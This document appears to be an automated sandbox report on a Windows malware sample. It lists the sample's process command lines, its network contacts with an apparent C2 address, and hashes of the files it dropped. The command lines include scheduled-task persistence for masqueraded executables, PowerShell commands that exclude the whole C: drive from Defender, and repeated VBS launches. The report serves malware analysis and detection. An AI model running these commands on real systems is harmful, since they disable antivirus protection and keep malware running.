schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Windows\SysWOW64\networklist\icons\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Mail\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

"C:\Recovery\WindowsRE\MoUsoCoreWorker.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b173bbe-c155-4fca-a1bc-1348087e4f1e.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5e5372fa-9571-4877-87d7-08cebadf1291.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dfa6ae54-1abb-4799-9a1c-a7f6e3815d91.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\313132f1-e73f-466b-a08c-01032800b875.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a9a35882-00d1-49f7-b58c-08b0cbc620f3.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b1a544a-5fe4-4148-b7b9-fb06e4de23db.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5894016f-f166-45a4-8001-8353ee8b6aca.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4d404ec8-e41e-439d-9aee-9c6344d69d40.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\80421db3-22ba-4217-84b8-0b03f7e86823.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c19902d6-a0b6-4a37-b4da-3b3035518e07.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e499dcae-6725-4353-9a5e-d80028b70d8b.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\91d16235-6993-49a6-80db-51ff7f5de65b.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58f8aa1a-4943-4f98-b8ac-c8dfc60c3da8.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bfdc1722-da0f-4ea5-aeec-96fd832e76bd.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\40610d9d-4d65-42d7-92a2-f88f3562d160.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\68a7a5be-6277-495a-a4fe-e4b1bb245181.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b70ae50e-4fef-443b-ac5e-eb6d7d8348af.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e397b3b3-123b-4999-b3be-40413dbff9ff.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5a8b9333-4fd5-40fd-b966-8f38bf7f9fec.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b6319cd0-a3a0-493b-b1cc-d1fd1506ea8e.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0c3fa160-ff4b-4f95-8342-56cb24859c61.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6d8a3fdc-54bf-44b0-82e2-3970ab15554b.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a89b5eb4-4336-4e09-8004-26c28cea6710.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58d2a68a-6a4f-4b9f-a89c-2b7d8979a8f3.vbs"

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0f8fa3c3-ca8a-4954-8181-9da7983f4cb7.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a356461c-b10c-42a4-8cc7-d915c6faab5d.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 21.121.18.2.in-addr.arpa udp
RU 149.154.68.247:80 149.154.68.247 tcp
US 8.8.8.8:53 247.68.154.149.in-addr.arpa udp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
RU 149.154.68.247:80 149.154.68.247 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp

Files

memory/1956-0-0x00007FFCFEE13000-0x00007FFCFEE15000-memory.dmp

memory/1956-1-0x0000000000100000-0x00000000003E6000-memory.dmp

memory/1956-2-0x00007FFCFEE10000-0x00007FFCFF8D1000-memory.dmp

memory/1956-3-0x00000000024F0000-0x000000000250C000-memory.dmp

memory/1956-6-0x000000001B010000-0x000000001B020000-memory.dmp

memory/1956-5-0x000000001B000000-0x000000001B008000-memory.dmp

memory/1956-7-0x000000001B020000-0x000000001B036000-memory.dmp

memory/1956-8-0x000000001B040000-0x000000001B048000-memory.dmp

memory/1956-10-0x000000001B070000-0x000000001B080000-memory.dmp

memory/1956-9-0x000000001B050000-0x000000001B058000-memory.dmp

memory/1956-4-0x000000001B690000-0x000000001B6E0000-memory.dmp

memory/1956-11-0x000000001B6E0000-0x000000001B6EA000-memory.dmp

memory/1956-12-0x000000001B6F0000-0x000000001B746000-memory.dmp

memory/1956-13-0x000000001B740000-0x000000001B74C000-memory.dmp

memory/1956-14-0x000000001B750000-0x000000001B758000-memory.dmp

memory/1956-15-0x000000001B760000-0x000000001B76C000-memory.dmp

memory/1956-16-0x000000001B770000-0x000000001B782000-memory.dmp

memory/1956-17-0x000000001BCD0000-0x000000001C1F8000-memory.dmp

memory/1956-23-0x000000001B7F0000-0x000000001B7FE000-memory.dmp

memory/1956-22-0x000000001B7E0000-0x000000001B7E8000-memory.dmp

memory/1956-21-0x000000001B7D0000-0x000000001B7DE000-memory.dmp

memory/1956-20-0x000000001B7C0000-0x000000001B7CA000-memory.dmp

memory/1956-19-0x000000001B7B0000-0x000000001B7B8000-memory.dmp

memory/1956-18-0x000000001B7A0000-0x000000001B7A8000-memory.dmp

memory/1956-24-0x000000001B800000-0x000000001B80C000-memory.dmp

memory/1956-25-0x000000001B810000-0x000000001B818000-memory.dmp

memory/1956-26-0x000000001B820000-0x000000001B82A000-memory.dmp

memory/1956-27-0x000000001B830000-0x000000001B83C000-memory.dmp

C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe

MD5 78e93535702e2a553d85bac1d4737210
SHA1 572ed789a4da08d6c3cc770b4b49bb6d6a4ea75f
SHA256 b6d844ec087f7be57656bfb4782919dbe0cf823301b441e68b7a7a8e757049fb
SHA512 ad2ff42ed3569df69618af61d3732744c3aa713816709dbe53b11ee07df97f744acd99c26155485a3dac76a4576592e181e3198bbaad86009de716b72a183baa

C:\Program Files\VideoLAN\upfc.exe

MD5 2a06e3beeaa835088a964ba57fe2c518
SHA1 9ed54ddf7ae1d9ad31fa32e5f930f4c2a3947117
SHA256 3c23c634ed615c63f2461ab55425b70293725caf46cd5b8823901feed63efcd6
SHA512 45f60e3d02e7c44b96d37b07d186f0e4fb5c84e5d44c73c56408bb9b2ef84cabc2be243cd94cf7129ff09f285cb2a0d2b4becc0bfdcbfd2d03ac7cf0f3e380a3

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1qoivwfd.m5b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1956-124-0x00007FFCFEE10000-0x00007FFCFF8D1000-memory.dmp

memory/3756-130-0x000001F97CBD0000-0x000001F97CBF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ZQqiTadxcN.bat

MD5 db8a077e7c45e7fa32483d62fda4a1c9
SHA1 ebb66bb68ea5d2fca325edb7e3254340ec61a1e4
SHA256 dcadd3a9996ceb163e47278267543483ba19c6616e7132118ce76a500d475b3d
SHA512 e6f346a71226c19c4aafc0d7c6a2bc88337b480f4317884b53837a9b4d309da9c425e241f70bc961aec7ae656c7711701601ab299752a5d3e368504e3b0ee6cd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd5940f08d0be56e65e5f2aaf47c538e
SHA1 d7e31b87866e5e383ab5499da64aba50f03e8443
SHA256 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512 c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 62623d22bd9e037191765d5083ce16a3
SHA1 4a07da6872672f715a4780513d95ed8ddeefd259
SHA256 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA512 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 65b1e267338bca7c1a2a806576540588
SHA1 56288ef4ce5f8d08ec0c04526977235cdcc58398
SHA256 d9e572e11e82aeaa1234751e49bbd186575575c55e09fad0818e0a2126d28a84
SHA512 8bedfda6abcad4581fabdd34bd89be5188c5387e535ff2dc9e34b0aa0667df677789dd283d67160b9f5a885f6a199d82b637d05ca8d3c8ba1380e2d6d7aba152

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe.log

MD5 bbb951a34b516b66451218a3ec3b0ae1
SHA1 7393835a2476ae655916e0a9687eeaba3ee876e9
SHA256 eb70c64ae99d14ac2588b7a84854fbf3c420532d7fe4dfd49c7b5a70c869943a
SHA512 63bcbfcf8e7421c66855c487c31b2991a989bdea0c1edd4c40066b52fa3eb3d9d37db1cd21b8eb4f33dd5870cc20532c8f485eab9c0b4f6b0793a35c077f2d6f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2ea91e7d1b473f8290ae52d13e105194
SHA1 5e565d99a7733250427e70f5f6e1951a081deed6
SHA256 712db2b991a3c11ccd71b36cfe99fad0b5b1eb1026b12d28c35a43334128671a
SHA512 0d6e2f0f8963986cb27a5cb853c5a87af5d2b65142ff082b4a12681b467d4a72efbcaea71307513523915aa4f27e7b238c67f4ab563f69525938f38253599424

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dd0716df5ff6e2ed8bfa08e271d64dd8
SHA1 c342bbe936058ea27843d5dbe5eb434f926612f7
SHA256 15ea3598b422f0d7705405688a174b98789b623154d4ccf3f3148f7c10bafdd8
SHA512 7e6dc8f9ad269ca3969e7b1284399f16f59559d5a4232537147fb7edcba86932474eff26921c09472894d55ee045dd3e371dcfce65d358785166742582e0b8a4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c9478c9419eff5c6f926498364d8c3a0
SHA1 0c68dfdd6106fc85121592d5f00ad2d9b5c888c1
SHA256 e5bc3944768915b60045d5d3e72eaeb665497fc815555ac8ec638edcee7b7587
SHA512 3267fb9291a2d10fea94199cbe99242516561d602949ce08e1926566955f6f08d2e7145851f4a96656b67a0a1a3c49aa43c9df3a5c6ac6e0b5e22fbd3cb96a11

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a672fcf7facce635c83caf7b195d0bf8
SHA1 fec2f6c2456efe713ba08fa692a4a356f2f37ba8
SHA256 71945453f618f8cf9c2ddb24132d7e0522643e13ce42a59ff65476938f56082c
SHA512 12713a140e8a73c9dd8b3bc309e3ff1256c16ecd019d1ded31ab47c71651b11dcdcf48ef889805e5bc87bdeb323c5663ff34313cc41170d2d9b45051107dc31f

memory/4648-489-0x000000001BBB0000-0x000000001BBC2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cfecb4e0f846589c2742fd84d6bbd1db
SHA1 730c66c99e80f1c7d0fdd1ef7483c9dfb0a770ec
SHA256 12190c96e9eef24f7ee9a4e19d806f29d4aedab1f2c696478dea5684941824aa
SHA512 669241f726837dcd3b6c6664e002c4938cf1ccf9be3f3b4a953efb35a2977c6ea9536e1b61b92b1b716991f9801f4516d8e1d53c65ac605174ece553f19da475

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 057e7742b25e65a341d1341da25b54a8
SHA1 65c874ac4f429a4172bdf89a73922e39873ecab6
SHA256 f8cf996545599e442f94820af5c724fca27d22de96bcef6aa308d0520c3a1468
SHA512 94b461e3705336b9ebf10df506f4a436cee20ac60540cfb6fd2f36c48e011836bf1f9e3f00e5b254ad6e6f1338a976dba495d398b4459687f518e815afde04e7

C:\Users\Admin\AppData\Local\Temp\5b173bbe-c155-4fca-a1bc-1348087e4f1e.vbs

MD5 08273c754b3c3929ad8a28521aeb250c
SHA1 cf63d7a413c563c224e0eafcb025d9d29f5e75e8
SHA256 87d26bbafd3e8eea7686200ea297ac226502e796dc191b593f40d09468724939
SHA512 62b242642c3e3a12f43a9dbb4847df5b331ec967e5fa65f912f440e40ec3559628e4195011a2d69d300d0312550e4a821eb073e8d67190aff9df375252d7338e

C:\Users\Admin\AppData\Local\Temp\5e5372fa-9571-4877-87d7-08cebadf1291.vbs

MD5 742b4b37c6f919194d0e4be1f736cd95
SHA1 18a32b01ca91d6f5a8906e44f0bece4c9a147ce5
SHA256 eea88b2b7bd81f39403385a468b5b90d9c2b311127e88aef0e877a2cdb8ff01b
SHA512 0e8bdbe113fa31c5ca232126e0b37208cf24aa6ae5f93266a82704ddfef9945a14976ccc27e9c4fe1428fbce6495964369bcabcfccb45c9f6d9f4895cd04748e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MoUsoCoreWorker.exe.log

MD5 4a667f150a4d1d02f53a9f24d89d53d1
SHA1 306e125c9edce66f28fdb63e6c4ca5c9ad6e8c97
SHA256 414659decfd237dde09625a49811e03b5b30ee06ee2ee97ea8bcfac394d281fd
SHA512 4edd8e73ce03488a6d92750a782cd4042fbb54a5b3f8d8ba3ea227fda0653c2cd84f0c5d64976c7cdc1f518a2fdc8ff10e2a015ec7acf3cd01b0d62bc98542d8

memory/3092-506-0x000000001B020000-0x000000001B076000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dfa6ae54-1abb-4799-9a1c-a7f6e3815d91.vbs

MD5 32ede7cbdb2a1c5e6526f793a9298af0
SHA1 8fcae9cb3bd7910c5dc49415128b748993922fa2
SHA256 4e89ccb358667c819967cf15d19c610d98bb004055be167a78088afd560c919b
SHA512 2dd4d0cb712fe66eadb210fd5b92707245187804ebfca3ebe8da2e47a8c2fb11b139fbc4f9b048d93d2351fa111ec926ee233bb81c43b21a8bf00816ea728b4f

memory/4132-518-0x000000001B280000-0x000000001B292000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a9a35882-00d1-49f7-b58c-08b0cbc620f3.vbs

MD5 86f461bfd4c383d8d471c455d2c024a4
SHA1 657ce0d65028bc693b15ce05c24345a4fd40164f
SHA256 d2d5a81883d9d82081ac6e85efcfaf08af705a8c7186856db938ca597e8d8ee2
SHA512 ade6611f6d01569dae9eb5a0c19c7d8a92d3b71a770cdf0eab1d18ca9f79d14fca8577b3d56b33756da97d265c5d5182980e2ccfd908b024302c0d80375c7360

C:\Users\Admin\AppData\Local\Temp\5894016f-f166-45a4-8001-8353ee8b6aca.vbs

MD5 52438066d0ffa6fb9784f69701339aba
SHA1 e8819ee53fcfef04173e4f81caca5f25fcfc77c6
SHA256 728de1dc9508c8eeedf5465acd4f02f5cf6a726fa82229e3689bcff80e4c625c
SHA512 f10e52f362f768c510681702a506390a8e1739e075c09955e0380a15003273e5785b7029917c99f2cbe67fce09c629bfeb44c428c4f3e1d640265aa9dc9eb11c

C:\Users\Admin\AppData\Local\Temp\80421db3-22ba-4217-84b8-0b03f7e86823.vbs

MD5 5d6a8da1ae1ad4fc8057c51f4b24c065
SHA1 31e81167ed19ad72615b0435c231f9b0021c8c3d
SHA256 c5d803be055b37f58b3b3fb7e451779d51ae317f5706de5efcc1a8a8c6074291
SHA512 5b4a6e8caadae10d3387cad728c5473374371aa254141ae4e636a5a66e8e3a8b034ce208b98b0b8a2eaab6230ccaa819727a7e08f04a2c9ab7b4329b2db4350f

C:\Users\Admin\AppData\Local\Temp\e499dcae-6725-4353-9a5e-d80028b70d8b.vbs

MD5 67c2904ab64c826ff200a1df6e90a7d1
SHA1 979e541f24b7b2b88df4281fd31f1c53430e7742
SHA256 e7909a47ec3a2de120629ba145499c470efd8c6a8b4f2dceefd40530aefa9a68
SHA512 4e4022fa183e3cb0f460d84524ff0f96bd700b165d83230d3b2e296e1d74a31d23f30e1cacd23d0b67f1e2615523ab3bfac7da2d0c974b2d82cbb8b81480b222

C:\Users\Admin\AppData\Local\Temp\58f8aa1a-4943-4f98-b8ac-c8dfc60c3da8.vbs

MD5 e5a0191daa8485d7219bab869c94350d
SHA1 e89fbe893169a77c7cf0fd2127fa484d05048939
SHA256 87f16eee25b3bf75a30f7391138198b0efbea770600406e57ec5eb00b310828d
SHA512 013c8085e98cd899fcdeb5f350d7219f4839850bae866b2dd8fb94c7af6d76041f1f9bbe3d9d20b8930269e2bf5ac36126d1032317cefbe0409a707e2b0419fe

memory/932-574-0x0000000002A10000-0x0000000002A22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\40610d9d-4d65-42d7-92a2-f88f3562d160.vbs

MD5 a6811b5da29d9baed168a893c9992ad7
SHA1 5f46d69e45011cda7bfc24c592cb9f8bbe984055
SHA256 25cd9a1afa92d5fa2ef06912d9f2bdeb051bbab09241b9ec464bf9b1d010e287
SHA512 36b6df18f1e8c9488e108eeb7b0abec2f79bd4723d03962562d3b19c1ba7ace0722b4a440364ff3e60d60f14472b2311b56f99c3fdee018a93f9a69ebb53f681

C:\Users\Admin\AppData\Local\Temp\b70ae50e-4fef-443b-ac5e-eb6d7d8348af.vbs

MD5 64f6df1b7cc7cde134f9592d5da389f0
SHA1 8bae95012a247f8ba89d35675e0bad6c78d10454
SHA256 f0b04210b106d1f0c357f60e364d0c094fb97d78b09b2acacd1118f625b7d6e4
SHA512 38677db1c5d80d03bf285a61db55ebd3eeddebb08acd56f848916b6d36bb3295a6852d5a732e47208665c834e8979691f915db2aed62a9ebf2231b48ebd29189

memory/3208-612-0x000000001BEC0000-0x000000001BF16000-memory.dmp